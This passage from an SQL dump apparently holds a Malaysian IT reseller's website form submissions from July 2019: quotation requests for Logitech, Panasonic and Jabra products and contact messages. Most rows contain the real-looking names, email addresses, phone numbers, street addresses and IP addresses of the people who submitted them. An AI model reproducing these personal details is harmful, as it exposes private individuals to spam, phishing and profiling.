digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"45\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-24 16:15:51','219.92.93.176','1'),(246,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Ng Wen Huey\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"ngwenhuey424@hotmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60122397313\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"APU\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"35, Jalan SB Indah, 2/9\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-24 16:24:15','210.19.13.180','1'),(247,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Zana Jasmine\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"jasmine@mbjs.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0184629213\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"MBJ Solution Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:106:\"Suite 33-01, Tingkat 33, Menara Keck Seng, 203 Jalan Bukit Bintang, 55100 Kuala Lumpur Wilayah Persekutuan\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"TOUGHBOOK 54\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:141:\"Kindly reply us as soon as possible as my company in need of the quotation for tender submission. Your reply is highly appreciated. Thank you\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"21\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-24 16:39:29','123.136.112.160','1'),(248,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Nik Aiemen Razieq\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"aiemen@mypower.gov.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192331993\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"MyPOWER Corporation\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:63:\"Logitech BCC950, Logitech Brio, Logitech C9230e, Logitech C925e\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"41\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-25 15:30:52','175.139.205.79','1'),(249,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Shahrizal\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"dotcompz@gmail.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0139823488\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Dotcomp Resources\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:80:\"Dotcomp Resources 843 , Jalan Hospital, Paya Bemban, 15200 Kota Bharu, Kelantan.\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Jabra Pro 920 c/w headset lifter GN1000 - 10 set\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-26 13:02:16','115.164.55.2','1'),(250,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Wendy lim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Siewcheng82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60105394349\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"A9\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for model Panasonic Toughpad JB-T1.preloved or new 1.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-28 23:12:39','123.136.116.129','1'),(251,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Wendy lim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Siewcheng82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60105394349\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"A9\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for model Panasonic Toughpad JB-T1.preloved or new 1.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-28 23:12:43','123.136.116.129','1'),(252,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Wendy lim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Siewcheng82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60105394349\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"A9\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for model Panasonic Toughpad JB-T1.preloved or new 1.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-28 23:12:49','123.136.116.129','1'),(253,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Wendy lim\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Siewcheng82@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60105394349\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:2:\"A9\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Looking for model Panasonic Toughpad JB-T1.preloved or new 1.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 